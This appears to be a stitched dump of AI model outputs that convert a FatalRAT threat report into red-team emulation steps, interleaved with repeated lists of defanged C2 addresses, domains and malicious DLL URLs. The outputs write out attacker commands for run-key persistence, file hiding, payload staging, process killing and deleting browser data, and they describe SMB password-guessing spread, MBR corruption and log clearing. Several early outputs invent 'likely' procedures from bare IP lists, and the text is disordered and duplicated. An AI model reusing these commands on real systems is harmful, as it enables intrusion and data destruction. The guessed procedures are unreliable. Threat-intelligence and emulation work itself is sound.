Backdoor.Win32.Agent.myuosm Trojan.Win32.Zapchast.bkbi Trojan.Win32.Zapchast.bkbj Trojan.Win32.Zapchast.bkbk Trojan.Win32.Zapchast.bkbl Trojan.Win32.Zapchast.bkbm Trojan.Win32.Zapchast.bkbn Trojan.Win32.Zapchast.bkhr Backdoor.Win32.Agent.myuolz Backdoor.Win32.Agent.myuomc Backdoor.Win32.Agent.myuomd Backdoor.Win32.Agent.myuomf Backdoor.Win32.Agent.myuomi Backdoor.Win32.Agent.myuoqw Backdoor.Win32.Agent.myuorl Backdoor.Win32.Agent.myuorw Backdoor.Win32.Agent.myuosj Backdoor.Win32.Agent.myuosk Backdoor.Win32.Agent.myuosm Backdoor.Win32.Agentb.ef Trojan.Win32.Agentb.lqfh Trojan.Win32.Agentb.lqfi Trojan.Win32.Agentb.lqfj Trojan.Win32.Agentb.lqfk Trojan.Win32.Agentb.lqfl Trojan.Win32.Agentb.lqfm Trojan.Win32.Zapchast.bkbi Trojan.Win32.Zapchast.bkbj Trojan.Win32.Zapchast.bkbk Trojan.Win32.Zapchast.bkbl Trojan.Win32.Zapchast.bkbm Trojan.Win32.Zapchast.bkbn Trojan.Win32.Zapchast.bkhr Backdoor.Win32.Agent.myuolz Backdoor.Win32.Agent.myuomc Backdoor.Win32.Agent.myuomd Backdoor.Win32.Agent.myuomf Backdoor.Win32.Agent.myuomi Backdoor.Win32.Agent.myuoqw Backdoor.Win32.Agent.myuorl Backdoor.Win32.Agent.myuorw Backdoor.Win32.Agent.myuosj Backdoor.Win32.Agent.myuosk Backdoor.Win32.Agent.myuosm Backdoor.Win32.Agentb.ef Trojan.Win32.Agentb.lqfh Trojan.Win32.Agentb.lqfi Trojan.Win32.Agentb.lqfj Trojan.Win32.Agentb.lqfk Trojan.Win32.Agentb.lqfl Trojan.Win32.Agentb.lqfm Trojan.Win32.Zapchast.bkbi Trojan.Win32.Zapchast.bkbj Trojan.Win32.Zapchast.bkbk Trojan.Win32.Zapchast.bkbl Trojan.Win32.Zapchast.bkbm Trojan.Win32.Zapchast.bkbn Trojan.Win32.Zapchast.bkhr IP addresses 101.33.243[.]31:82 43.154.238[.]130:6000 134.122.137[.]252:6000 43.154.238[.]130:8081 111.230.93[.]174:8081 43.159.192[.]196:6000 43.138.199[.]241:6000 175.178.166[.]216:6000 43.139.35[.]42:6000 43.139.101[.]11:6000 81.71.1[.]107:6000 175.178.89[.]24:6000 106.52.216[.]112:6000 43.154.68[.]193:6000 107.148.54[.]105:6000 47.106.224[.]107:6000 154.39.238[.]101:6000 206.233.130[.]141:6000 107.148.50[.]116:6000 103.144.29[.]211:6000 107.148.52[.]241:6000 107.148.50[.]112:6000 107.148.52[.]242:6000 111.230.10[.]93:6000 111.230.32[.]52:6000 107.148.50[.]113:6000 111.230.108[.]14:6000 175.178.96[.]9:8081 1.12.37[.]113:8081 111.230.15[.]48:8081 111.230.91[.]145:8081 111.230.45[.]217:8081 154.91.227[.]32:6000 82.156.145[.]216:6000 122.152.231[.]146:6000 154.206.236[.]9:6000 119.29.219[.]211:6000 107.148.52[.]176:6000 120.78.173[.]89:6000 120.79.91[.]168:6000 114.132.46[.]48:6000 123.207.35[.]145:6000 8.217.0[.]16:6000 123.207.1[.]145:6000 114.132.56[.]175:6000 119.29.235[.]38:6000 123.207.79[.]195:6000 139.199.168[.]63:6000 123.207.55[.]60:6000 43.138.176[.]5:6000 123.207.16[.]43:6000 123.207.58[.]147:6000 103.144.29[.]123:6000 156.236.67[.]181:6000

The provided data seems to list various malware families and IP addresses, but lacks specific attack procedures or command lines. For a more comprehensive emulation, we would need additional context or descriptions of actions performed by these malware types.

However, I can outline typical procedures these types of malware might employ, based on common TTPs associated with such threats:

Phase: Initial Access

• Technique: Exploit Public-Facing Application
• Procedure: Use of vulnerabilities in public-facing software to gain entry.

Phase: Execution

• Technique: Command and Scripting Interpreter: Windows Command Shell
• Likely Command: cmd.exe /c <malicious_command>

Phase: Persistence

• Technique: Registry Run Keys / Startup Folder
• Likely Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d C:\Path\to\malware.exe

Phase: Privilege Escalation

• Technique: Exploitation for Privilege Escalation
• Likely Procedure: Leveraging known exploits to elevate privileges.

Phase: Defense Evasion

• Technique: Obfuscated Files or Information
• Likely Procedure: Encoding or encrypting payloads to bypass antivirus.

Phase: Credential Access

• Technique: OS Credential Dumping
• Likely Tool: mimikatz.exe

Phase: Lateral Movement

• Technique: Remote Services: PsExec
• Likely Command: psexec \\target -u user -p pass cmd.exe /c <command>

Phase: Collection

• Technique: Data from Local System
• Likely Procedure: Searching and collecting sensitive files.

Phase: Command and Control

• Technique: Application Layer Protocol
• Likely Procedure: Use of HTTP/S to communicate with C2 server.

Phase: Impact

• Technique: Data Encrypted for Impact
• Likely Procedure: Encrypt files using a custom or known encryption tool.

For detailed emulation, obtaining more detailed reports or intelligence specific to these malware variants would be necessary.

123.207.44[.]193:6000 123.207.8[.]204:6000 114.132.121[.]130:6000 154.197.6[.]103:6000 42.193.242[.]180:6000 47.57.68[.]157:8080 101.33.243[.]31:82 43.154.238[.]130:6000 134.122.137[.]252:6000 43.154.238[.]130:8081 111.230.93[.]174:8081 43.159.192[.]196:6000 43.138.199[.]241:6000 175.178.166[.]216:6000 43.139.35[.]42:6000 43.139.101[.]11:6000 81.71.1[.]107:6000 175.178.89[.]24:6000 106.52.216[.]112:6000 43.154.68[.]193:6000 107.148.54[.]105:6000 47.106.224[.]107:6000 154.39.238[.]101:6000 206.233.130[.]141:6000 107.148.50[.]116:6000 103.144.29[.]211:6000 107.148.52[.]241:6000 107.148.50[.]112:6000 107.148.52[.]242:6000 111.230.10[.]93:6000 111.230.32[.]52:6000 107.148.50[.]113:6000 111.230.108[.]14:6000 175.178.96[.]9:8081 1.12.37[.]113:8081 111.230.15[.]48:8081 111.230.91[.]145:8081 111.230.45[.]217:8081 154.91.227[.]32:6000 82.156.145[.]216:6000 122.152.231[.]146:6000 154.206.236[.]9:6000 119.29.219[.]211:6000 107.148.52[.]176:6000 120.78.173[.]89:6000 120.79.91[.]168:6000 114.132.46[.]48:6000 123.207.35[.]145:6000 8.217.0[.]16:6000 123.207.1[.]145:6000 114.132.56[.]175:6000 119.29.235[.]38:6000 123.207.79[.]195:6000 139.199.168[.]63:6000 123.207.55[.]60:6000 43.138.176[.]5:6000 123.207.16[.]43:6000 123.207.58[.]147:6000

The provided input consists solely of IP addresses and ports, which are considered Indicators of Compromise (IOCs). There are no specific procedures, command-line executions, or attack techniques included in the input. As such, the data cannot be directly used to extract threat actor procedures for red team emulation without additional contextual information about tactics or tools used.

If you have a CTI report detailing command lines, executed programs, tools, or attack techniques, please provide that information so I can assist in extracting and structuring the procedures.

103.144.29[.]123:6000 156.236.67[.]181:6000 123.207.44[.]193:6000 123.207.8[.]204:6000 114.132.121[.]130:6000 154.197.6[.]103:6000 42.193.242[.]180:6000 47.57.68[.]157:8080 Domain names microsoftupdatesoftware[.]ga 0a305ffb2a1d41f6870eac02f9afce89[.]xyz microsoftupdatesoftware[.]ga microsoftmiddlename[.]tk cloudservicesdevc[.]tk novadector[.]xyz microsoftupdatesoftware[.]ga 0a305ffb2a1d41f6870eac02f9afce89[.]xyz xindajiema[.]info Vip033324[.]xyz microsoftmiddlename[.]tk cloudservicesdevc[.]tk novadector[.]xyz microsoftupdatesoftware[.]ga 101.kkftodesk101[.]top 102.kkftodesk102[.]top 104.kkftodesk104[.]top 105.kkftodesk105[.]top 106.kkftodesk106[.]top 107.kkftodesk107[.]top 108.kkftodesk108[.]top 109.kkftodesk109[.]top 110.kkftodesk110[.]top 34.kosdage[.]asia microsoftmiddlename[.]tk cloudservicesdevc[.]tk novadector[.]xyz microsoftupdatesoftware[.]ga 0a305ffb2a1d41f6870eac02f9afce89[.]xyz xindajiema[.]info Vip033324[.]xyz microsoftmiddlename[.]tk cloudservicesdevc[.]tk novadector[.]xyz microsoftupdatesoftware[.]ga 101.kkftodesk101[.]top 102.kkftodesk102[.]top 104.kkftodesk104[.]top 105.kkftodesk105[.]top 106.kkftodesk106[.]top 107.kkftodesk107[.]top 108.kkftodesk108[.]top 109.kkftodesk109[.]top 110.kkftodesk110[.]top 34.kosdage[.]asia URLs of malicious files on legitimate services http://note.youdao[.]com/yws/api/note/4b2eead06fc72ee2763ef1f653cdc4ae http://note.youdao[.]com/yws/api/note/1eaac14f58d9eff03cf8b0c76dcce913 http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL2auto.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/FANGAOtest.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll

Based on the information provided, here is the extraction and structure of the likely procedures used by the threat actor:

Phase: Initial Access

• Technique: Drive-by Compromise
• Procedure: The threat actor uses URLs to host and distribute malicious DLL files on legitimate services to lure victims into downloading or executing them.

Phase: Execution

• Technique: Dynamic Link Library (DLL) Execution
• Likely Command: Using rundll32.exe to execute the downloaded malicious DLLs, e.g., rundll32.exe path\to\malicious.dll,EntryPointFunction.

Phase: Persistence

• Technique: DLL Hijacking
• Procedure: The attacker replaces or tricks legitimate applications to load the malicious DLLs during startup or application execution.

Phase: Command and Control

• Technique: Application Layer Protocol
• Procedure: Establish communication between compromised systems and the attacker's command and control server using non-standard ports (e.g., port 6000 or 8080).

Phase: Evasion

• Technique: Utilize Legitimate Services for Hosting Malicious Files
• Procedure: The attacker leverages legitimate cloud services to host malicious payloads, making detection and attribution more difficult.

This structure provides a logical flow for red teams to emulate the attack based on the observed behaviors and techniques of the threat actor.

http://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll http://mytodesktest-1257538800.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/before1/BEFORE.dll http://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/before2/BEFORE.dll http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://529-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll http://529-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http://529-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://530-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://note.youdao[.]com/yws/api/note/4b2eead06fc72ee2763ef1f653cdc4ae http://note.youdao[.]com/yws/api/ note/1eaac14f58d9eff03cf8b0c76dcce913 http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL2auto.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/FANGAOtest.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/ BEFORE.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://todesk-1316713808.cos.ap- nanjing.myqcloud[.]com/DLL.dll http://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http:// todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll http://mytodesktest-1257538800.cos.ap-nanjing.myqcloud[.]com/ DLL.dll http://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://yuehai-1316713808.cos.ap- nanjing.myqcloud[.]com/FANGAO.dll http://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/before1/BEFORE.dll http:// yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/before2/BEFORE.dll http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/ FANGAO.dll http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll http://526-1316713808.cos.ap- nanjing.myqcloud[.]com/DLL2.dll http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://529-1316713808.cos.ap- nanjing.myqcloud[.]com/BEFORE.dll http://529-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http://529-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://530-1316713808.cos.ap-nanjing.myqcloud[.]com/ FANGAO.dll http://note.youdao[.]com/yws/api/note/4b2eead06fc72ee2763ef1f653cdc4ae http://note.youdao[.]com/yws/api/note/1eaac14f58d9eff03cf8b0c76dcce913 http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL2auto.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/FANGAOtest.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll http://mytodesktest-1257538800.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/before1/BEFORE.dll http://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/before2/BEFORE.dll http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll

The provided text primarily contains URLs pointing to potential threat actor resources, such as DLL files. However, it doesn't explicitly detail specific command lines, executed programs, tools, or attack techniques described in a typical CTI report. For red team emulation, I can infer potential procedures that might involve downloading and executing these DLLs:

Phase: Initial Access

• Technique: Trusted Relationship (Cloud Storage Abuse)
• Procedure: The attacker uploads malicious DLL files to cloud storage services, making them accessible through shared URLs.

Phase: Execution

• Technique: DLL Side-Loading
• Command (Example): Use a legitimate application vulnerable to side-loading to load one of the malicious DLLs.
• Procedure: shell rundll32.exe C:\path\to\legitimate\executable.dll,EntryPoint
  • This assumes the DLLs are designed to replace or augment functionality in a legitimate application.

Phase: Command and Control

• Technique: Application Layer Protocol
• Procedure (Inference): Communicate back to a command and control server by leveraging common web protocols, potentially embedding commands or additional payloads within API usage.

For accurate red team emulation, having more data about how these DLLs are used, any payloads they download or execute, and specific commands to interact with them would be critical.

http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http://526-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll http://529-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll http://529-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll http://529-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll http://530-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll Registry keys HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SVP7 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SVP7 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SVP7 File path C:\ProgramData\KnGoe C:\user0 C:\ProgramData\8877 C:\Windows\nw_elf.dll C:\Windows\Fatal.key C:\ProgramData\jy.lnk C:\ProgramData\KnGoe C:\user0 C:\ProgramData\8877 C:\Windows\nw_elf.dll C:\Windows\Fatal.key C:\ProgramData\jy.lnk PDB paths C:\Users\fangao\Desktop\unrar-tag-6.1.7\build\unrardll32\Release\UnRAR.pdb K:\C++\梵高远程管理客户端二号\Release\FANGAO.pdb K:\C++\梵高远程管理客户端二号\Release\BEFORE.pdb K:\C++2010\DLLrun\DLLrunYoudao\Release\DLLrunYoudao.pdb K:\C++\DLL反射注入器四件套二号\Release\DLL运行器DLL版(wke.dll).pdb C:\Users\fangao\Desktop\unrar-tag-6.1.7\build\unrardll32\Release\UnRAR.pdb K:\C++\梵高远程管理客户端二号 \Release\FANGAO.pdb K:\C++\梵高远程管理客户端二号\Release\BEFORE.pdb K:\C+ +2010\DLLrun\DLLrunYoudao\Release\DLLrunYoudao.pdb K:\C++\DLL反射注入器四件套二号\Release\DLL运行器DLL版 (wke.dll).pdb C:\Users\fangao\Desktop\unrar-tag-6.1.7\build\unrardll32\Release\UnRAR.pdb K:\C++\梵高远程管理客户端二号\Release\FANGAO.pdb K:\C++\梵高远程管理客户端二号\Release\BEFORE.pdb K:\C++2010\DLLrun\DLLrunYoudao\Release\DLLrunYoudao.pdb K:\C++\DLL反射注入器四件套二号\Release\DLL运行器DLL版(wke.dll).pdb System objects UniqueMutexName – mutex name UniqueMutexName – mutex name UniqueMutexName – mutex name

Phase: Persistence

• Technique: Registry Run Key Modification
• Command: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v SVP7 /t REG_SZ /d "C:\ProgramData\KnGoe\malicious.exe" /f

Phase: Defense Evasion

• Technique: DLL Injection
• Procedure: The threat actor uses DLL injection by placing malicious DLLs (e.g., nw_elf.dll) in system directories or within existing processes.

Phase: Defense Evasion

• Technique: Use of Packed Files
• Command: Execution from directories such as C:\ProgramData\KnGoe to evade detection by storing packed or obfuscated executables.

Phase: Persistence

• Technique: Shortcuts Modification
• Command: Place a malicious shortcut C:\ProgramData\jy.lnk to maintain persistence by pointing it to an executable launched during startup.

Phase: Defense Evasion

• Technique: Mutex Creation
• Procedure: Create a mutex named UniqueMutexName to ensure only a single instance of the malware runs at a time.

Phase: Execution

• Technique: Remote DLL Loading
• Procedure: Load DLLs from remote sources, such as the URLs provided, for dynamic code execution.

Model: gemini-2.0-flash

Ok, I will extract the TTPs from the report in the specified format, focusing on command-line actions, executed programs, and attack techniques while excluding IOCs like IPs, domains, and file hashes.

Phase: Initial Access

• Technique: Spearphishing with Malicious Archive
• Procedure: The attacker delivers a malicious ZIP archive via email, WeChat, or Telegram, disguising it as invoices or legitimate tax filing applications.

Phase: Execution

• Technique: Execution of First-Stage Loader
• Procedure: User executes the first-stage loader (executable within the malicious archive).
• Procedure: The first-stage loader downloads a dynamically updated list of URLs from Youdao Cloud Notes.
• Command: HTTP GET request to Youdao Cloud Notes to retrieve URLs.

Phase: Configuration

• Technique: Dynamic Configuration Retrieval

• Procedure: Before.dll downloads malware configuration information from Youdao Cloud Notes using HTTP requests.

• Technique: Before.dll saves the configuration file content into C:\Users\Public\vanconfig.ini

• Technique: Data encryption using XOR with key 0x58 to create vanconfig.ini

• Technique: Generates six-character random value and saves into history.txt

Phase: Exploitation

• Technique: DLL Sideloading with DriverAssistant

• Procedure: DriverAssistant (acvb.exe) loads wke.dll. wke.dll will call function wkeInit and trigger the next stage.

• Technique: Code injection using DLLReflective

• Procedure: Wke.dll makes an HTTP GET request to download the final FatalRAT payload.

• Command: HTTP GET request to download the final payload from cloud storage.

• Procedure: Decrypt the payload using xor operation.

• Technique: Executing PureCodec application using update.ini

• Procedure: Modify the update.ini configuration file to execute YX.vbs

• Technique: Running YX.vbs using wscript.shell createobject

• Command: set ws=wscript.createobject("wscript.shell") and then ws.run "C:\ProgramData\KnGoe\user.bat",0

• Technique: Using DriverAssistant Tool to bypass UAC

Phase: Persistence

• Technique: Group Policy Modification via GUI Simulation
• Procedure: Executes Windows Explorer to open folder containing group policy editor: C:\ProgramData\8877
• Procedure: Hides the Windows Explorer window
• Procedure: Simulate mouse clicks and keystrokes on UI elements within the Group Policy Editor to create a new user logon script using tool Local Group Policy Editor, which opens the PureCodec application used for execution in the attack C:\ProgramData\KnGoe\Ouser.exe

Phase: Post-Exploitation

• Technique: Process Termination
• Procedure: Checks if usero.exe is already running and kills it.

• Command: taskkill /f /im @user.exe

• Technique: File Attribute Modification.

• Command: attrib +s +a+h +r "C:\usero"
• Command: attrib +s +a +h +r "C:\test"
• Command: attrib +s +a +h +r "C:\ProgramData\KnGoe\*.vbs"

• Command: attrib +s +a +h +r "C:\user\*.*"

• Technique: Keylogging

• Procedure: FatalRAT starts intercepting keystrokes and writes the information to C:\Windows\Fatal.key.

• Technique: Registry modification

• Command: Modify the key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation to 1 to prevents the system from locking.

Phase: Discovery

• Technique: Process Discovery via Tasklist
• Procedure: Checks the running processes to see if acvb.exe using tasklist and findstr.

• Command: tasklist | findstr /i "acvb.exe"

• Technique: Running processes.

• Command: Starts processes: %AppData%\run.exe -e -n d.rar, then starts svp7.exe, and 1200.exe.

Phase: Lateral movement

• Technique: SMB Scanning
• Procedure: Scan the network for devices running Windows that have shared folders accessible via SMB protocol

Phase: Impact

• Technique: Remote Access Software Installation (UltraViewer, AnyDesk)
• Procedure: Downloads and installs remote administration tools with set connection parameters.

I have tried to focus on actions that a red team could reasonably emulate in an engagement.

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the attack procedures and techniques, focusing on red team emulation:

Phase: Initial Access

• Technique: Phishing via Malicious Archives
  • Procedure: Attackers send malicious ZIP archives disguised as invoices or legitimate tax filing applications.
  • Delivery Mediums: Email, WeChat, and Telegram.
• Technique: Payload Packing
  • Tool: AsProtect, UPX, NSPack
  • Procedure: First-stage loader is packed using publicly available packers to hinder detection and analysis.

Phase: Execution

• Technique: Multi-Stage Loader Execution
  • Tool: First-stage loader (e.g., DLLrunYoudao.pdb from debug info)
  • Procedure: The first-stage loader executes, making an HTTP request to a cloud notes service to download an updated list of URLs for subsequent modules.
• Technique: Dynamic Configuration Retrieval
  • Tool: Configurator (Before.dll)
  • Procedure: The configurator downloads dynamic configuration information from a cloud notes service, then decrypts it (XOR key 0x58).
• Technique: File Concatenation and Staging
  • Tool: user.bat script
  • Command (inferred from user.bat):
    • copy /b <source_ini_file>+<source_dll_file> <destination_executable_file>
    • Example: copy /b C:\ProgramData\KnGoe\t.ini+C:\ProgramData\KnGoe\w.dll C:\usero\acvb.exe
    • Example: copy /b C:\ProgramData\KnGoe\t.ini+C:\ProgramData\KnGoe\e.dll C:\usero\DDUtility.dll
    • Example: copy /b C:\ProgramData\KnGoe\t.ini+C:\ProgramData\KnGoe\r.dll C:\usero\DMMUtility.dll
    • Example: copy /b C:\ProgramData\KnGoe\t.ini+C:\ProgramData\KnGoe\t.dll C:\usero\wke.dll
• Technique: Script Execution
  • Tool: YX.vbs (VBScript)
  • Command (from VBScript): ws.run "C:\ProgramData\KnGoe\user.bat",0
  • Procedure: ouser.exe (legitimate PureCodec app) executes YX.vbs via wscript.shell, which in turn runs user.bat.
• Technique: DLL Sideloading
  • Tool: Legitimate acvb.exe (DriverAssistant utility)
  • Procedure: The malicious wke.dll (third-stage loader) is placed in a location where acvb.exe will load it. acvb.exe then loads and executes the malicious wke.dll's exported wkeInit function.
  • Tool: Malicious wke.dll
  • Procedure: wke.dll downloads the final FatalRAT payload (DLL.dll) and executes it in memory without saving to disk.
• Technique: Direct Process Execution
  • Tool: Fangao.dll (second-stage loader)
  • Procedure: Fangao.dll launches the legitimate ouser.exe.
  • Tool: FatalRAT
  • Procedure: The final FatalRAT payload is executed in memory.

Phase: Persistence

• Technique: Group Policy Logon Script Creation (GUI Automation)
  • Tool: Malicious program (Fangao.dll) interacting with Local Group Policy Editor.msc
  • Procedure:
    1. Opens Windows Explorer to C:\ProgramData\8877.
    2. Hides the Explorer window.
    3. Sends messages to the hidden Explorer window to emulate mouse clicks, launching the Local Group Policy Editor.msc.
    4. Hides the Group Policy Editor window.
    5. Navigates within the Group Policy Editor GUI (User Configuration -> Windows Settings -> Scripts (Logon/Logoff)) by emulating keystrokes (WM_KEYDOWN, WM_KEYUP).
    6. Creates a new group policy in the Logon subsection that points to the legitimate PureCodec application: C:\ProgramData\KnGoe\ouser.exe.
• Technique: Registry Run Key Modification
  • Tool: FatalRAT
  • Command (inferred): reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v SVP7 /t REG_SZ /d C:\Windows\nw_elf.dll /f
  • Procedure: Downloads FatalRAT binary to C:\Windows\nw_elf.dll and sets it as a value for the SVP7 registry key to ensure persistence on login.
• Technique: Service Creation
  • Tool: FatalRAT
  • Procedure: FatalRAT can create a service for persistence, using name and description from configuration data.
• Technique: Mutex Creation
  • Tool: Fangao.dll
  • Procedure: Creates a mutex with the name UniqueMutexName to ensure single instance execution.

Phase: Defense Evasion

• Technique: Anti-Analysis/VM/Sandbox Detection
  • Tool: FatalRAT and Fangao.dll
  • Procedure: Checks for specific files (My Document.txt, My Document.xls) on desktop.
  • Procedure: Checks for C:\tmp substring in its executable path.
  • Procedure: Checks for special characters in its filename.
  • Procedure: Checks system localization language (e.g., Chinese variants) and time zone (UTC+8).
  • Procedure: Checks for vmware substring in registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\o.
• Technique: Process Termination
  • Tool: Fangao.dll
  • Command (inferred): taskkill /f /im mmc.exe
  • Procedure: Searches for running mmc.exe processes and terminates them.
  • Tool: FatalRAT
  • Command (inferred): taskkill /f /im rundll32.exe
  • Procedure: Terminates all rundll32.exe processes.
• Technique: File Attribute Modification
  • Tool: Fangao.dll, user.bat
  • Command (inferred): attrib +s +h <executable_file> (for unrar.dll)
  • Command (from user.bat): attrib +s +a +h +r "C:\usero"
  • Command (from user.bat): attrib +s +a +h +r "C:\test"
  • Command (from user.bat): attrib +s +a +h +r "C:\ProgramData\KnGoe\*.vbs"
  • Command (from user.bat): attrib +s +a +h +r "C:\usero\*.*"
  • Procedure: Sets hidden, system, read-only, and archive attributes on various malicious files and directories to obscure their presence.
• Technique: User Distraction
  • Tool: Before.dll
  • Procedure: Extracts and displays a fake invoice document to distract the user.
  • Tool: Fangao.dll
  • Procedure: Displays a fake "Microsoft Visual C++ Runtime Library" error message.
• Technique: Obfuscated Execution
  • Tool: Batch script (user.bat)
  • Command (from user.bat): @ping 127.0.0.1 -n <count> >nul
  • Procedure: Uses ping commands to introduce delays and pause script execution.

Phase: Discovery

• Technique: System Information Discovery
  • Tool: Before.dll, Fangao.dll, FatalRAT
  • Procedure: Collects system name, Windows version, operating system installation time, architecture, and CPU information.
  • Procedure: Collects user name and checks if the user is idle.
  • Procedure: Checks for running Tencent QQ messenger.
  • Procedure: Checks for the presence of various security solutions and other software processes (e.g., avp.exe, egui.exe, Mcshield.exe).
• Technique: Process Discovery
  • Tool: user.bat
  • Command (from user.bat): tasklist | findstr /i "acvb.exe"
  • Procedure: Lists running processes and searches for specific executables.
• Technique: Network Connection Check
  • Tool: Fangao.dll
  • Procedure: Attempts to connect to Baidu.com to verify internet connectivity.

Phase: Command and Control

• Technique: Data Exfiltration over HTTP
  • Tool: FatalRAT
  • Procedure: Sends collected system information to the attacker's server via HTTP GET requests (e.g., /initialsubmission?windows_version=<version>&computer_name=<name>).
  • Procedure: Keylogger data is sent to the C2.
• Technique: Encrypted Communication
  • Tool: FatalRAT
  • Procedure: Encrypts and decrypts C2 traffic using a custom routine (e.g., Encrypt_C2_data).

Phase: Impact

• Technique: Data Deletion
  • Tool: FatalRAT
  • Command (from report): del /s /f %appdata%\Mozilla\Firefox\Profiles\*.db
  • Procedure: Deletes user data from Chrome, Internet Explorer, Skype, 360se6, Tencent QQBrowser, and SogouExplorer.
• Technique: System Manipulation
  • Tool: FatalRAT
  • Procedure: Corrupts the Master Boot Record (MBR).
  • Procedure: Opens and closes the CD/DVD drive.
  • Procedure: Shows and hides the Program Manager window.
  • Procedure: Plays monophonic sounds through speakers.
  • Procedure: Moves running windows and plays sounds.
  • Procedure: Turns the screen off and on.
  • Procedure: Swaps and restores left/right mouse button functions.
  • Procedure: Changes screen resolution (e.g., to 1600x900).
• Technique: Process Kill
  • Tool: FatalRAT
  • Command (inferred): taskkill /f /im explorer.exe
  • Procedure: Kills the explorer.exe process.
  • Procedure: Kills a specified process by ID.
• Technique: Event Log Clearing
  • Tool: FatalRAT
  • Procedure: Clears Windows event logs (Security, System, Application) to remove forensic traces.
• Technique: Malicious Software Installation
  • Tool: FatalRAT
  • Procedure: Downloads and installs remote access tools like UltraViewer and AnyDesk, running AnyDesk with a specific connection password (123456).

Phase: Lateral Movement

• Technique: Network Share Discovery and Exploitation
  • Tool: FatalRAT
  • Procedure: Scans the network for Windows devices with shared folders accessible via SMB protocol.
  • Procedure: Attempts to connect to shared folders (admin$, C$, D$, E$, F$) on remote systems using the Administrator login and a list of common passwords (e.g., administrator, test, admin, guest, 123456).
  • Procedure: If a connection is successful, copies its executable (hackshen.exe) to the shared folder and runs it.